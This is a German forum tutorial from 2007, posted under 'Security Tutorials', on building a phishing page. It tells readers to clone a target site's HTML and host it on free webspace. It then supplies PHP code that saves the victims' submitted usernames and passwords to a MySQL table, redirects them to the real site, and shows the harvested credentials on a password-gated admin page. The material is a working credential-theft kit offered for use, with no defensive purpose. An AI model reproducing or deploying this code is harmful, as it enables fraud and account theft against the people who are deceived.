Phishing-Page(sql-database)

Dieses Thema im Forum "Security Tutorials" wurde erstellt von plz.die.thx.bye, 1. August 2007 .

Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. 1. August 2007
    Phishing Page - SQL-Database-Tutorial



    ---------------------------------

    Als erstes krallt ihr euch den source code der zu kopierenden webseite, welcher an euren browser geschikt wurde...
    Im klartext, ihr geht offnet die page die ihr kopieren wollt, in eurem browser und lasst euch deren queletext anzeigen
    (im IE... Rechtsklick->Queletext anzeigen), dieser queletext, ist nartürlich bei einer php seite, nur das html,
    das von dem php-script auf dem server generiert wurde. Das macht aber nichts, Da ihr nach umwandlung der relativen links zu den grafiken..etc..
    Ein abbild der originalen page habt.

    ---------------------------------

    Nun meldet ihr euch bei einem free-webspace anbieter an, bei den ihr auch noch zugriff auf eine SQL Datenbank habt.

    Erstellt nun folgende dateien alle in einem gemeinsamen verzeichniss...(Was in den dateien nacher steht, wird weiter unten erklärt^^)

    ---------------------------------
    index.html
    send.php
    sqlconnect.php
    make.php
    admin.php
    ---------------------------------

    Öffnet die "index.html" in einem stink normalen text-editor...und kopiert den abgeänderten html-source-code (den wir wieter oben besprochen haben: "Naja, dann fang ich ma eben an...")
    in die geöffnete "index.html" und speichert diese ab.

    Öffnet die "send.php" tippt oder kopiert folgenden code hinein nartürlich ohne die abgrenzungen(#####...)).

    #################################

    <?
    include ("sqlconnect.php");
    $username = $_POST["username"];
    $userpasswort = $_POST["passwort"];
    $eintrag = "INSERT INTO base (user, pwd) VALUES ('$username', '$userpasswort')";
    $eintragen = mysql_query($eintrag);
    ?>
    <meta http-equiv="refresh" content="0; URL=http://xxx.de">

    #################################

    anstatt: "http://xxx.de" gebt ihr nartürlich die adresse zur Seite an, an die das "Opfer", (nachdem es die daten abgesendet hat) weitergeleitet werden soll.

    Öffnet die "sqlconnect.php" tippt oder kopiert folgenden code hinein nartürlich ohne die abgrenzungen(#####...)).

    #################################

    <?
    $server = "localhost";
    $user = "root";
    $pwd = "1337";
    $database = "data";
    mysql_connect("$server","$user","$pwd") or die ("Keine Verbindung moeglich");
    mysql_select_db("$database") or die ("Die Datenbank existiert nicht");
    ?>

    #################################

    anstatt "localhost" gebt ihr den servernamen an, der euch bei eurem free-webspace anbieter zur verfügung steht.(Sucht mal nach "(MY)SQL und den verbindungsdaten.
    anstatt "root" gebt ihr euren sql-benutzernamen an.(findet ihr ebenfalls bei eurem free-webspace anbieter.(ihr müsst euch dazu nartürlich mit nach der registration einloggen)
    anstatt "1337" gebt ihr das dazugehörige passwort ein.(findet ihr ebenfalls bei eurem free-webspace anbieter)
    anstatt "data" gebt ihr den datenbanknamen ein.(findet ihr ebenfalls bei eurem free-webspace anbieter)

    Öffnet die "make.php" tippt oder kopiert folgenden code hinein nartürlich ohne die abgrenzungen(#####...)).

    #################################

    <?
    include ("sqlconnect.php");
    $sql = 'CREATE TABLE `base` ('
    . ' `user` VARCHAR(255) NOT NULL, '
    . ' `pwd` VARCHAR(255) NOT NULL'
    . ' )'
    . ' ENGINE = myisam;';
    $eintragen = mysql_query($sql);
    echo "Tabelle erstellt... Kannst diese datei jetzt löschen";
    ?>

    #################################


    Öffnet die "admin.php" tippt oder kopiert folgenden code hinein nartürlich ohne die abgrenzungen(#####...)).

    #################################

    <?
    include ("sqlconnect.php");
    $ident = $_POST["pw"];
    if (isset($ident))
    {
    if ($ident=="deinpw")
    {

    $abfrage = "SELECT * FROM base";
    $ergebnis = mysql_query($abfrage);
    while($row = mysql_fetch_object($ergebnis))
    {
    echo "ID: $row->user";
    echo "&nbsp;&nbsp;&nbsp;";
    echo "PW: $row->pwd";
    echo "<br>";
    }
    }
    else
    {
    echo "Sorry dat war wohl nix!";
    }
    }
    else
    {
    echo "<form action=\"admin.php\" method=\"post\">";
    echo "<input type=\"text\" name=\"pw\" size=\"21\" value=\"pw eingeben\" maxlength=\"50\">";
    echo "</form>";
    }
    ?>

    #################################

    anstatt "deinpw" gebt ihr ein belibiges Passwort ein.

    So..zum abschluss ladet ihr diese 5 Dateien auf euren webspace hoch, und führt die "make.php" im browser aus ... also ruhft z.B. folgende seite auf: "http://deinname.deinanbieter.de/make.php".
    Jetzt löscht die "make.php" aus dem verzeichniss, und ihr könnt nun eure webseite direkt über "index.html" aufrufen, und ihr könnt die eingetragenen daten der "Opfer"
    über die "admin.php" aufrufen... z.B.: "http://deinname.deinanbieter.de/admin.php".

    -----------------------------------------------

    Das wars eig. auch schon zur eigenen phishing-page mit SQL-Database...


    Bw wäre net

    Mfg Andy
     
  2. Video Script

    Videos zum Themenbereich

    * gefundene Videos auf YouTube, anhand der Überschrift.